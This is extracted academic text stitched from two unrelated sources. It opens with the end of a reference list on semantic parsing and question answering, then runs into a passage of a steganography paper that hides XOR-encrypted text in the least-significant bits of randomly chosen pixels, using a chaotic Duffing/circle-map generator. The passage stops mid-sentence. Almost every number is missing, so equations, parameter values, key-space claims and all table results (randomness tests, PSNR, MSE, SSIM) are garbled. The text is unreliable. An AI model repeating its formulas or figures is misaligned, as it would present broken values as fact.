we ac- knowledge the financial support of eu ist cognitive systems ip ec-fp - “xperience” (steedman) and epsrc (ep/k / ) in the framework of the chist-era readers project (lapata). references jacob andreas and dan klein. . alignment-based compositional semantics for instruction following. in proceedings of empirical methods on natural lan- guage processing, pages – . yoav artzi, kenton lee, and luke zettlemoyer. . broad-coverage ccg semantic parsing with amr. in proceedings of empirical methods on natural lan- guage processing, pages – . jason baldridge and geert-jan kruijff. . coupling ccg and hybrid logic dependency semantics. in pro- ceedings of association for computational linguistics, pages – . junwei bao, nan duan, ming zhou, and tiejun zhao. . knowledge-based question answering as ma- chine translation. in proceedings of association for computational linguistics, pages – . hannah bast and elmar haussmann. . more accu- rate question answering on freebase. in proceedings of acm international conference on information and knowledge management, pages – . paul bédaride and claire gardent. . deep semantics for dependency structures. in proceedings of confer- ence on intelligent text processing and computational linguistics, pages – . jonathan berant and percy liang. . semantic parsing via paraphrasing. in proceedings of association for computational linguistics, pages – . jonathan berant and percy liang. . imitation learning of agenda-based semantic parsers. transac- tions of the association for computational linguistics, : – . jonathan berant, andrew chou, roy frostig, and percy liang. . semantic parsing on freebase from question-answer pairs. in proceedings of empirical methods on natural language processing, pages – . antoine bordes, sumit chopra, and jason weston. . question answering with subgraph embeddings. in proceedings of empirical methods on natural lan- guage processing, pages – . johan bos, stephen clark, mark steedman, james r. cur- ran, and julia hockenmaier. . wide-coverage semantic representations from a ccg parser. in pro- ceedings of international conference on computational linguistics, pages – . qingqing cai and alexander yates. . large-scale semantic parsing via schema matching and lexicon extension. in proceedings of association for computa- tional linguistics, pages – . bob carpenter. . type-logical semantics. mit press, cambridge, ma, usa. david l. chen and raymond j. mooney. . learning to interpret natural language navigation instructions from observations. in proceedings of association for the advancement of artificial intelligence, pages – . eunsol choi, tom kwiatkowski, and luke zettlemoyer. . scalable semantic parsing with partial ontolo- gies. in proceedings of association for computational linguistics, pages – . philipp cimiano. . flexible semantic composition with dudes. in proceedings of international confer- ence on computational semantics, pages – . michael collins. . discriminative training methods for hidden markov models: theory and experiments with perceptron algorithms. in proceedings of empiri- cal methods on natural language processing, pages – . ann copestake, alex lascarides, and dan flickinger. . an algebra for semantic construction in constraint-based grammars. in proceedings of associ- ation for computational linguistics, pages – . ann copestake, dan flickinger, carl pollard, and ivan a. sag. . minimal recursion semantics: an in- troduction. research on language and computation, ( - ): – . mary dalrymple, john lamping, fernando c. n. 
pereira, and vijay a. saraswat. . linear logic for mean- ing assembly. in proceedings of computational logic for natural language processing. marie-catherine de marneffe and christopher d manning. . stanford typed dependencies manual. technical report, stanford university. ralph debusmann, denys duchier, alexander koller, marco kuhlmann, gert smolka, and stefan thater. . a relational syntax-semantics interface based on dependency grammar. in proceedings of interna- tional conference on computational linguistics, pages – . li dong, furu wei, ming zhou, and ke xu. . ques- tion answering over freebase with multi-column con- volutional neural networks. in proceedings of associ- ation for computational linguistics, pages – . jeffrey flanigan, sam thomson, jaime carbonell, chris dyer, and noah a. smith. . a discriminative graph-based parser for the abstract meaning repre- sentation. in proceedings of association for computa- tional linguistics, pages – . yoav freund and robert e. schapire. . large margin classification using the perceptron algorithm. ma- chine learning, ( ): – , december. claire gardent and laura kallmeyer. . semantic construction in feature-based tag. in proceedings of european chapter of the association for computa- tional linguistics, pages – . ruifang ge and raymond mooney. . learning a compositional semantic parser using an existing syntactic parser. in proceedings of association for computational linguistics, pages – . jonas groschwitz, alexander koller, and christoph teich- mann. . graph parsing with s-graph grammars. in proceedings of association for computational linguis- tics, pages – . michael heilman and noah a. smith. . tree edit models for recognizing textual entailments, para- phrases, and answers to questions. in proceedings of north american chapter of the association for com- putational linguistics, pages – . aravind k. joshi, laura kallmeyer, and maribel romero. . flexible composition in ltag: quantifier scope and inverse linking. in harry bunt and reinhard muskens, editors, computing meaning, volume of studies in linguistics and philosophy, pages – . springer netherlands. jayant krishnamurthy and tom mitchell. . weakly supervised training of semantic parsers. in proceed- ings of empirical methods on natural language pro- cessing, pages – . jayant krishnamurthy and tom m. mitchell. . learn- ing a compositional semantics for freebase with an open predicate vocabulary. transactions of the associ- ation for computational linguistics, : – . tom kwiatkowksi, luke zettlemoyer, sharon goldwater, and mark steedman. . inducing probabilistic ccg grammars from logical form with higher-order unification. in proceedings of empirical methods on natural language processing, pages – . tom kwiatkowski, eunsol choi, yoav artzi, and luke zettlemoyer. . scaling semantic parsers with on-the-fly ontology matching. in proceedings of empirical methods on natural language processing, pages – . john lafferty, andrew mccallum, and fernando pereira. . conditional random fields: probabilistic mod- els for segmenting and labeling sequence data. in proceedings of international conference on machine learning, pages – . mike lewis and mark steedman. . a* ccg parsing with a supertag-factored model. in proceedings of empirical methods on natural language processing, pages – . percy liang, michael jordan, and dan klein. . learning dependency-based compositional seman- tics. in proceedings of association for computational linguistics, pages – . 
fei liu, jeffrey flanigan, sam thomson, norman sadeh, and noah a. smith. . toward abstractive sum- marization using semantic representations. in pro- ceedings of north american chapter of the association for computational linguistics, pages – . christopher d. manning, mihai surdeanu, john bauer, jenny finkel, steven j. bethard, and david mcclosky. . the stanford corenlp natural language pro- cessing toolkit. in proceedings of association for com- putational linguistics, pages – . andre martins, miguel almeida, and noah a. smith. . turning on the turbo: fast third-order non- projective turbo parsers. in proceedings of associa- tion for computational linguistics, pages – . cynthia matuszek, nicholas fitzgerald, luke zettle- moyer, liefeng bo, and dieter fox. . a joint model of language and perception for grounded at- tribute learning. in proceedings of international con- ference on machine learning. ryan mcdonald, fernando pereira, kiril ribarov, and jan hajič. . non-projective dependency parsing using spanning tree algorithms. in proceedings of empirical methods on natural language processing, pages – . richard montague. . the proper treatment of quan- tification in ordinary english. in k.j.j. hintikka, j.m.e. moravcsik, and p. suppes, editors, approaches to nat- ural language, volume of synthese library, pages – . springer netherlands. michael moortgat. . categorical investigations. log- ical and linguistic aspects of the lambek calculus. foris, dordrecht. michael moortgat. . generalized quantification and discontinuous type constructors. technical report, university of utrecht. shashi narayan and claire gardent. . hybrid sim- plification using deep semantics and machine transla- tion. in proceedings of association for computational linguistics, pages – . joakim nivre, johan hall, jens nilsson, atanas chanev, gülsen eryigit, sandra kübler, svetoslav marinov, and erwin marsi. . maltparser: a language- independent system for data-driven dependency pars- ing. natural language engineering, ( ): – . ankur p. parikh, hoifung poon, and kristina toutanova. . grounded semantic parsing for complex knowl- edge extraction. in proceedings of north american chapter of the association for computational linguis- tics, pages – . ellie pavlick, johan bos, malvina nissim, charley beller, benjamin van durme, and chris callison-burch. . adding semantics to data-driven paraphrasing. in pro- ceedings of association for computational linguistics, pages – . fernando c. n. pereira. . categorial semantics and scoping. computational linguistics, ( ): – . carl pollard and ivan a. sag. . head-driven phrase structure grammar. university of chicago press. hoifung poon. . grounded unsupervised semantic parsing. in proceedings of association for computa- tional linguistics, pages – . vasin punyakanok, dan roth, and wen-tau yih. . mapping dependencies trees: an application to ques- tion answering. in proceedings of international sym- posium on artificial intelligence and mathematics, pages – . siva reddy, mirella lapata, and mark steedman. . large-scale semantic parsing without question- answer pairs. transactions of the association for com- putational linguistics, : – . tim rocktäschel, sameer singh, and sebastian riedel. . injecting logical background knowledge into embeddings for relation extraction. in proceedings of north american chapter of the association for compu- tational linguistics, pages – . gabriel stanovsky, jessica ficler, ido dagan, and yoav goldberg. . getting more out of syntax with props. 
arxiv e-prints, march. mark steedman. . taking scope - the natural se- mantics of quantifiers. mit press. chuan wang, nianwen xue, and sameer pradhan. . a transition-based algorithm for amr parsing. in proceedings of north american chapter of the associ- ation for computational linguistics, pages – . ralph weischedel, eduard hovy, martha palmer, mitch marcus, robert belvin, sameer pradhan, lance ramshaw, and nianwen xue. . ontonotes: a large training corpus for enhanced processing. in j. olive, c. christianson, and j. mccary, editors, hand- book of natural language processing and machine translation. springer. yuk wah wong and raymond j. mooney. . learning for semantic parsing with statistical machine trans- lation. in proceedings of north american chapter of the association for computational linguistics, pages – . yuk wah wong and raymond mooney. . learn- ing synchronous grammars for semantic parsing with lambda calculus. in proceedings of association for computational linguistics, pages – . kun xu, yansong feng, songfang huang, and dongyan zhao. . question answering via phrasal semantic parsing. in proceedings of conference and labs of the evaluation forum, pages – . yi yang and ming-wei chang. . s-mart: novel tree-based structured learning algorithms applied to tweet entity linking. in proceedings of association for computational linguistics, pages – . xuchen yao and benjamin van durme. . informa- tion extraction over structured data: question answer- ing with freebase. in proceedings of association for computational linguistics, pages – . xuchen yao, benjamin van durme, chris callison-burch, and peter clark. . answer extraction as sequence tagging with tree edit distance. in proceedings of north american chapter of the association for compu- tational linguistics, pages – . xuchen yao. . lean question answering over free- base from scratch. in proceedings of north american chapter of the association for computational linguis- tics, pages – . wen-tau yih, ming-wei chang, xiaodong he, and jian- feng gao. . semantic parsing via staged query graph generation: question answering with knowl- edge base. in proceedings of association for compu- tational linguistics, pages – . john m. zelle and raymond j. mooney. . learning to parse database queries using inductive logic pro- gramming. in proceedings of association for the ad- vancement of artificial intelligence, pages – . luke s. zettlemoyer and michael collins. . learning to map sentences to logical form: structured clas- sification with probabilistic categorial grammars. in proceedings of uncertainty in artificial intelligence, pages – . hao zhang and ryan mcdonald. . enforcing struc- tural diversity in cube-pruned dependency parsing. in proceedings of association for computational linguis- tics, pages – . steganography in color images with random order of pixel selection and encrypted text message embedding steganography in color images with random order of pixel selection and encrypted text message embedding krasimir kordov and stanimir zhelezov department of computer informatics, faculty of mathematics and computer science, konstantin preslavski university of shumen, shumen, shumen, bulgaria department of computer systems and technologies, faculty of mathematics and computer science, konstantin preslavsky university of shumen, shumen, shumen, bulgaria abstract information security is major concern in modern digital ages, and the outdated algorithms need to be replaced with new ones or to be improved. 
in this article a new approach for hiding secret text message in color images is presented, combining steganography and cryptography. the location and the order of the image pixels chosen for information embedding are randomly selected using chaotic pseudo- random generator. encrypting the secret message before embedding is another level of security designed to misguide the attackers in case of analyzing for traces of steganography. evaluating the proposed stegoalgorithm. the standard statistical and empirical tests are used for randomness tests, key-space analysis, key-sensitivity analysis, visual analysis, histogram analysis, peak signal-to-noise ratio analysis, chi-square analysis, etc. the obtained results are presented and explained in the present article. subjects algorithms and analysis of algorithms, cryptography, multimedia, security and privacy keywords steganography, text encryption, color images steganography, least-significant bit steganography, steganographic analysis introduction steganology is an ancient science that is becoming more and more widely used with the development of digital information. it consists of two main areas: steganography and steganalysis. steganography is an interdisciplinary applied science field (cox et al., ; stanev & szczypiorski, ), a set of technical skills and art for ways to hide the fact of transmission (presence) of information. it is one of the most effective approaches to protecting important information by hiding it (data hiding). high-tech steganography summarizes the areas for hiding messages using communication and computer technology, nanotechnology and modern advances in sciences such as biology, chemistry and others (wu et al., ; koptyra & ogiela, ; abd-el-atty et al., ). steganalysis has exactly the opposite task. it combines methods and technologies for detecting secret steganographic communications. along with the beginning of the development of modern ways of hiding information, at the end of the th century research in the field of steganalysis (johnson & jajodia, ; provos & honeyman, ; how to cite this article kordov k, zhelezov s. . steganography in color images with random order of pixel selection and encrypted text message embedding. peerj comput. sci. :e doi . /peerj-cs. submitted november accepted january published january corresponding author krasimir kordov, krasimir.kordov@shu.bg academic editor robertas damaševičius additional information and declarations can be found on page doi . /peerj-cs. copyright kordov and zhelezov distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:krasimir.�kordov@�shu.�bg https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ fridrich & goljan, ) has begun. steganalysis is divided into two main categories: blind and targeted (zhelezov, ). targeted steganalysis methods have been developed to detect data embedded with specific stegoalgorithms and they are very accurate against certain stegomethods. the blind analysis methods are based on algorithms that require prior “training” with a series of empty and filled containers. the most characteristic of both types of analysis is that their methods are based on statistical dependencies in the analyzed subjects (nissar & mir, ). 
such a method is pov (pairs of values) as part of the chi-square analysis (westfeld & pfitzmann, ; fridrich, goljan & du, ). related work one of the latest research which shows successful optical character recognition (ocr) steganography technique with good results in steganalysis, is presented in (chatterjee, ghosal & sarkar, ). other example of resent steganographic research is described in (pak et al., ), where the authors are using chaotic map for constructing a steganographic algorithm. popular methods for image steganography are analyzed in table . the main task of the steganographic algorithm is to reduce the efficiency of such methods and thus to increase its reliability. for this purpose, it is necessary to choose a method of embedding that does not violate the statistical dependencies. for this reason, a spread spectrum steganography approach (marvel, boncelet & retter, ; satish et al., ) based on a pseudo-random sequence generator has been chosen in this article. additional text encryption is applied for transforming the secret message into unreadable character sequence for increasing the level of security of the proposed steganographic algorithm. in this approach, the resulting pseudo-random sequences are used to determine the message embedding positions. this leads to preserving the statistical dependencies in the container. another advantage of this approach is related to some types of targeted steganalysis. they extract the values of the smallest bits of the file sequentially and analyze them for repetitive sequences. with the embedding method proposed in the article this type of steganalysis is completely ineffective. motivation and justification the text messages and the digital images are the most used information carriers concerning the data flow in the internet and mobile communications. there are thousand of chat applications designed for short text messages correspondence using different ways to secure the communications between the users. variety of cryptographic algorithms are implemented in order to protect the transferred information. unfortunately, some of the encryption methods have become outdated and the new ones are being invented to improve secure communication. information security will always be a major concern that motivates the development of new secret methods for data distribution and real-time communication. such method is proposed in this work by combining two general scientific areas: steganography and cryptography. kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table survey of some recent stego research. reference marvel, boncelet & retter ( ) method the method uses a fast compressed-domain embedding technique to facilitate on-the-fly compressed-domain public-key steganography notes low probability of detection and leaving an observer unaware that the hidden data exist. the method works with grayscale images reference satish et al. ( ) method the method is based on a scheme of chaos based spread spectrum image steganography (cssis) involving the use of chaotic encryption and chaotic modulation in spread spectrum image steganography (ssis) notes a novel scheme of the use of chaos based encryption. robustness is achieved by interleaving the message using a chaotic sequence reference baby et al. 
( ) method the method is based on hiding multiple color images into a single color image using the discrete wavelet transform notes dwt increases the payload of the steganographic process by data compression. the proposed approach provides a good psnr and ssim value which establish the robustness of this work reference amirulhaqi, purboyo & nugrahaeni ( ) method the method is based on spread spectrum steganography and the vigenere cipher embedding in gif images notes the method consists of three processes, namely the spreading, modulation, and insertion of a gif image to the message reference yadav & dutta ( ) method the method is based on spread spectrum image steganography with rsa message encryption. notes high level of security. spreading the message all over the pixels of the cover media using pseudo random generator that generates random locations of pixels in an image and embedding message with least significant bit algorithm to make it highly indiscernible reference gaurav & ghanekar ( ) method the method presents a steganography algorithm based on local reference edge detection technique and exclusive disjunction in the sharp edge region compared to the uniform region of the image notes this paper presents an improved steganography technique on the basis of hvs system with an improved xor technique reference chatterjee, ghosal & sarkar ( ) method the method is based on optical character recognition (ocr) based steganographic technique. notes advantages—indicating correct classification by the model and high psnr values. the method works with grayscale images. slow embedding process for large images reference pak et al. ( ) method the method is based on an improved d chaotic system model notes the conventional one-dimensional ( d) chaotic map has a simple structure, which is easy to implement and has a low computational cost. the algorithm shows a good performance against statistical analysis attacks. conventional one-dimensional ( d) chaotic map has a drawback that the range of chaotic behaviors is narrow and the distribution of key sequence is uniform kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ an outline of the proposed work our main focus is to present a different approach for classic lsb steganography in images using random order of pixel selection and embedding encrypted text message. in order to achieve our goal the proposed technique requires the following steps: � constructing novel pseudo-random generator � secure text encryption, using the constructed pseudo-random generator � choosing random pixels (in chaotic order) from an image, using the constructed pseudo- random generator for embedding information � using traditional lsb pixel’s color modification for hiding, leaving no traces of steganography. pseudo-random generator based on duffing map and circle map for random pixel selection we are using pseudo-random generator (prg) described in this section. pseudo-random generators (also called pseudo-random number generators (prng)) are software realized and unlike true-random generators (trg) are easy for implementation with significantly lower cost and time consumption. this is why they are often used in cryptographic and steganographic systems. examples of prgs can be found in (kordov, , b). the requirement resistance of prgs is to different types of attacks are discussed in this section. 
duffing map description the duffing map is well known two dimensional non-linear discrete-time dynamical system with chaotic behavior (holmes & moon, ) which is a discrete version of duffing oscillator (van dooren, ). duffing map is given by: xtþ ¼ yt ytþ ¼ �bxt þ ayt � y t ; ( ) where xt and yt are double variables, calculated on every iteration, and a and b are fixed parameters of the duffing map. for chaotic behavior the parameters are set to a = . and b = . (hasan et al., ; riaz et al., ). the initial test values we used for variables are x = − . and y = . and fig. is a graphical representation of the duffing map with the described values. circle map description the circle map is explored for chaotic behavior in shenker ( ) and deguzman & kelso ( ). it has random-like properties and is suitable for constructing prgs (kordov, a). the standard circle map equation is: uiþ ¼ ðui þ � � k p sinð puiÞÞ mod ; ( ) where θ is a double variable and Ω and k are the controlling parameters with values kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ Ω = . , k = . . the initial value for the variable we used for experiments in this article is θ = − . . figure is a graphical representation of the circle map with the described values. - - . - - . . . x(t) - - . - - . . . y( t) figure duffing map plot with a = . , b = . , x = − . and y = . . full-size doi: . /peerj-cs. /fig- i - . - . . . . . . figure circle map plot with Ω = . , k = . and θ = − . . full-size doi: . /peerj-cs. /fig- kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ random bit extraction process the proposed bit extraction process is using eqs. ( ) and ( ) and contains the following steps: � the initial values of the constant parameters from eqs. ( ) and ( ) are determined and the initial values of the double variables are set (described in the previous sections). � for additional security, first n iterations from eq. ( ) and first m iterations from eq. ( ) are skipped. (we randomly chose n = m = ). � on every iteration of eq. ( ), xt and yt are used for calculation of additional double variable pt: temp t ¼ jintegerðxt � Þjmod ; temp t ¼ jintegerðyt � Þjmod ; pt ¼ temp xor temp ( ) and θi from eq. ( ) is used for calculation of the variable qt: qt ¼ jintegerðut � Þjmod ( ) � the produced random bit is obtained by performing xor operation between the variables pt and qt. � the previous two steps are repeated until the necessary random binary sequence is reached. key-sensitivity analysis this test is performed to determine the behavior of the proposed prg if there are changes in the secret key that is used to produce binary sequences. to test the key sensitivity very similar secret keys are used (described in table ) by changing a single digit in one of the initial double variables. the results of the experiment are graphically presented in fig. and clearly show that the final binary sequence is different every time even if the secret keys are very table secret keys values. secret variable values key x y θ k − . . − . k − . . − . k − . . − . k − . . − . k − . . − . k − . . − . k − . . − . kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ similar. 
this means the proposed prg is very sensitive to any changes in the initial conditions. key-space analysis the key-space includes the variety of possible values of the used variables in random bit generation. equation ( ) has two initial variables that can have different values (x and y ) and eq. ( ) has one variable −θ . the parameters from the equations are constant so they cannot be part of the secret key. in addition to the secret key, the integer values of n and m also can have different values. considering the floating point standard of ieee for double variables (ieee computer society, ) every double variable has precision about − . combining the three variables we have ( ) ≈ plus ( ) for the two integer variables and final about for key-space. the required key-space for resisting brute-force attacks is (alvarez & li, ) which means that the proposed prg is secure enough. kay-space comparison is presented in table . figure circle map plot with Ω = . , k = . and θ = − . . (a) plot of binary sequence using secret key k . (b) plot of binary sequence using secret key k . (c) plot of binary sequence using secret key k . (d) plot of binary sequence using secret key k . (e) plot of binary sequence using secret key k . (f) plot of binary sequence using secret key k . (g) plot of binary sequence using secret key k . full-size doi: . /peerj-cs. /fig- kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ randomness evaluation the most important property of a prg is to produce random binary numbers. to evaluate the randomness billion bits are generated and the sequence is tested with the most popular statistical test software packages. nist—random test the first software for randomness evaluation is nist—statistical test suite (bassham et al., ) and includes base tests. the testing process is performed by dividing the tested sequence into , subsequences with length of , , bits. all the nist need to have p-values in the range [ , ) to be considered for successfully passed. the results for all tests are summarized in table . diehard—ramdom test the second test package is diehard software (marsaglia, ) and contains test for randomness. the tests applied for the same bitstream of billion bits generated by our prg. the acceptable range again for calculated p-values is [ , ) for passing the individual tests. the results for all tests are summarized in table . all the tests in table have p-values in range [ , ), indicating that all the tests for randomness evaluation are passed. ent—ramdom test the ent statistical test software (walker, ) is the last package we used for randomness evaluation. the ent software tests are: entropy test, optimum compression test, χ distribution test, arithmetic mean value test, monte carlo π estimation test, and serial correlation coefficient test. in table are presented the results for all tests from ent software. steganography in color images with random pixel selection the proposed method combines the classical least-significant bit (lsb) value replacement by choosing random positions of hiding in the image. the random order and the message encryption is performed by the proposed prg. message embedding algorithm the process is performed by the following steps: . the text information is transformed to vector v of binary sequence using ascii table values of the characters. table key-space comparison of prgs. 
reference key-space kordov ( a) kordov ( ) kordov ( b) proposed kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . control character sequence marking the end of the secret message is converted also in binary sequence and added to the vector v. (in our case we used “*#”). . the binary sequence in vector v is encrypted using xor operation and random sequence produced by prg with secret key . the result vector is v′. . the proposed prg is used with the secret key to produce two times bits for selecting random position in an image with following rule: x position ¼ integerð bitsÞ mod image width; y position ¼ integerð bitsÞ mod image height ( ) . if a pixel with position (x,y) is used the previous step is repeated until unused pixel position is found. . lsb technique is used for embedding three bits from vector v′ into red, green and blue color values of the selected pixel. . steps – are repeated until the sequence from vector v′ is embedded into the final stego image. message extraction algorithm the process is performed by the following steps: . the proposed prg is used with the secret key to produce two times bits for selecting random position in the image with the following rule: x position ¼ integerð bitsÞ mod image width; y position ¼ integerð bitsÞ mod image height ( ) . if a pixel with position (x,y) is used the previous step is repeated until unused pixel position is found. . the lsb values from red, green and blue colors are copied into vector v′. . every bits are transformed into char value and every last two obtained characters are compared with the control sequence that marks the end of the message (“*#”). . steps – are repeated until the control sequence is reached. . the binary sequence in vector v′ is decrypted using xor operation and random sequence produced by prg with secret key . the result vector is v′. . vector v is transformed from binary sequence into ascii chars equivalent forming the original hidden text message. experimental setup for our empirical experiments we used . ghz intel core i - qm dell inspiron laptop with gb ram, x windows pro operating system. the proposed method is realized using c++ programing language and the test images are personal photos taken within our university region. sixteen color images are selected— with dimensions × and with dimensions × . matlab r a software is used for histogram plotting and image analysis and processing. the initial values used for prg are x = − . , y = . , θ = − . and for n and m − . kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ steganographic analysis in this section, the most used tests for steganographic analysis are included for testing the proposed stego algorithm. the color images are tested by embedding secret messages with different length. the messages are random only for the experiments and contain letters ( bits), letters ( , bits), letters ( , bits), letters ( , bits), letters ( , bits), , letters ( , bits), and , letters ( , bits). all the test in supplemental file and . visual analysis this is the most mandatory test for steganographic algorithm. a necessary requirement for any stego algorithm is to leave no visual traces of embedded secret messages or message container changes. figure shows one of the test images with its corresponding stego images with different lengths of embedded information. 
figure clearly demonstrates that there are no visual differences between the images and no traces of hidden messages. more examples are presented in fig. , to confirm that there are no visual trace of steganography in corresponding stego images. histogram analysis the image histograms are used for graphical representation of the tonal distribution of the red, green and blue colors. this experiment is designed to analyze if there are any changes in color distribution when the proposed steganographic method is applied. table nist test suite results. the minimum pass rate for each statistical test with the exception of the random excursion (variant) test is approximately = for a sample size = , binary sequences. the minimum pass rate for the random excursion (variant) test is approximately = for a sample size = binary sequences. nist test p-value pass rate frequency . / , block-frequency . / , cumulative sums (forward) . / , cumulative sums (reverse) . / , runs . / , longest run of ones . / , rank . / , fft . / , non-overlapping templates . / , overlapping templates . / , universal . / , approximate entropy . / , random-excursions . / random-excursions variant . / serial . / , serial . / , linear complexity . / , kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure shows the histograms of a test image with its corresponding stego images and table shows average pixel intensity values. the histogram attack method (fridrich & goljan, ) is historically the first statistical attack described in the resources. it is based on the fact that with lsb embedding, the even pixel values either remain unchanged (unmodified) or are being increased by , while the odd pixel values either remain unchanged or decrease. thus, the values ( i, i + ) form a pair of values (pov), which are exchanged during embedding. this asymmetry in the embedding function can be used and a statistical test applied to confirm or deny that the table diehard statistical test results. diehard test p-value birthday spacings . overlapping -permutation . binary rank ( × ) . binary rank ( × ) . binary rank ( × ) . bitstream . opso . oqso . dna . stream count-the-ones . byte count-the-ones . parking lot . minimum distance . d spheres . squeeze . overlapping sums . runs up . runs down . craps . table ent statistical test results. ent test result entropy . bits per byte optimum compression oc would reduce the size of this , , byte file by % χ distribution for , , samples is . , and randomly would exceed this value . % of the times arithmetic mean value . ( . = random) monte carlo π estimation . (error . %) serial correlation coefficient − . (totally uncorrelated = . ) kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ even values follow the known distribution. the statistical steganalysis based on the chi-square method is based on this. it makes a histogram (the frequency of occurrence of each color in the image) of the color distribution and based on it, pairs of adjacent values (pov) are formed, differing in the youngest bit. then a theoretical histogram of the color distribution is made, showing the expected distribution of the values in the presence of hidden information and pairs of adjacent values are formed again. 
the difference between the observed and expected occurrence frequencies for each pair is sought. in our case the observation of fig. shows that the tonal distribution is not changed when the secret messages are hidden in the plain image. peak signal-to-noise ratio and structural similarity analysis the peak signal-to-noise ratio (psnr) measure the possible maximum power of the clean signal against the power of the noise signal. poorly changing the pixel values of an image can lead to corruption of the image quality which may uncover a possible steganography. psnr is calculated using the following equation: psnr ¼ log max mse ðdbÞ; ( ) where max is the maximum possible value of the pixel color. considering that every pixel has bits for red, green and blue color, we use the average value of the three values figure visual comparison of a container image and corresponding stego images. (a) container color image. (b) stego image with chars embedded. (c) stego image with chars embedded. (d) stego image with chars embedded. (e) stego image with chars embedded. (f) stego image with chars embedded. the photos were taken by the authors. full-size doi: . /peerj-cs. /fig- kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ meaning max = − = . mse is the mean square error between the plain and stego images defined as: mse ¼ nm xn i¼ xm j¼ ðpx;y � sx;yÞ ( ) where px,y and sx,y are the corresponding pixel values from the plain and stego images, respectively. considering the color images have red, green and blue values for every pixel, the (px,y − sx,y) is calculated by: ðrvalueplain−rvaluestegoÞ þ ðgvalueplain−gvaluestegoÞ þ ðbvalueplain−bvaluestegoÞ ( ) the structural similarity (ssim) is another method used in steganographic analysis proposed and described in wang et al. ( ). the test is designed to determine the similarity between two images, in our case the similarity between plain and corresponding stego images. values close to are indicators for the best possible structural similarity between the compared images. part of the obtained values for mse, psnr and ssim are shown in table . the mse and psnr values are calculated for images with chars ( bits), , chars a) e) b) f) c) g) d) h) figure additional examples of the proposed steganographic scheme. (a) container image—main corpus. (b) container image—monument. (c) container image—solarpanels. (d) container image—fitness. (e) stego image—main corpus. (f) stego image—monument. (g) stego image— solar panels. (h) stego image—fitness. the photos were taken by the authors. full-size doi: . /peerj-cs. /fig- kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ( , bits), and , chars ( , bits) embedded. all the results are available in supplemental file . table shows high values for psnr (over db) meaning the stego algorithm do not destroy the image quality with considered minimum requirement of – db for low quality. the obtained values for ssim are close to the best possible value − . additional metrics analysis some researchers use different metrics for steganographic analysis of their methods. 
for evaluation of the proposed algorithm we performed additional experiments for the most used indicators—average difference (ad), structural content (sc), normalized cross-correlation (ncc), maximum difference (md), laplacian mean squared error (lmse), normalized absolute error (nae), image quality index (iqi). the best possible value for sc, ncc, md and iqi is and for ad, lmse and nae is . the results for our method are presented in table . all the results are available in supplemental file . the obtained results in table show results close to the perfect values demonstrating the stability and efficiency of the proposed stegoalgorithm. figure histogram analysis of a plain image and corresponding stego images. (a) container color image. (b) stego image with chars embedded. (c) stego image with chars embedded. (d) stego image with chars embedded. (e) stego image with chars embedded. (f) stego image with chars embedded. full-size doi: . /peerj-cs. /fig- kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table the mse, psnr and ssim values for images with chars ( bits), , chars ( , bits), and , chars ( , bits) embedded. file name stego image with chars embbeded stego image with , chars embbeded stego image with , chars embbeded mse psnr ssim mse psnr ssim mse psnr ssim f - x . . . . . . . . . f - x . . . . . . . . . f - x . . . . . . . . . f - x . . . . . . . . . f - x . . . . . . . . . f - x . . . . . . . . . f - x . . . . . . . . . f - x . . . . . . . . . f - x . . . . . . . . . f - x . . . . . . . . . f - x . . . . . . . . . f - x . . . . . . . . . f - x . . . . . . . . . f - x . . . . . . . . . f - x . . . . . . . . . f - x . . . . . . . . . table average pixel intensity comparison. file name plain image red stego image red plain image green stego image green plain image blue stego image blue f - x . . . . . . f - x . . . . . . f - x . . . . . . f - x . . . . . . f - x . . . . . . f - x . . . . . . f - x . . . . . . f - x . . . . . . f - x . . . . . . f - x . . . . . . f - x . . . . . . f - x . . . . . . f - x . . . . . . f - x . . . . . . f - x . . . . . . f - x . . . . . . kordov and zhelezov ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ comparison in order to compare the proposed method with other image steganographic algorithms we use the presented metrics (where available) in related articles. the main metrics for defining the security and the reliability of the stegomethods are related to preserving the quality of the cover images and keeping the similarity with the stego images. for the image quality estimation the psnr and mse metrics are applied, and for the similarity of the cover and 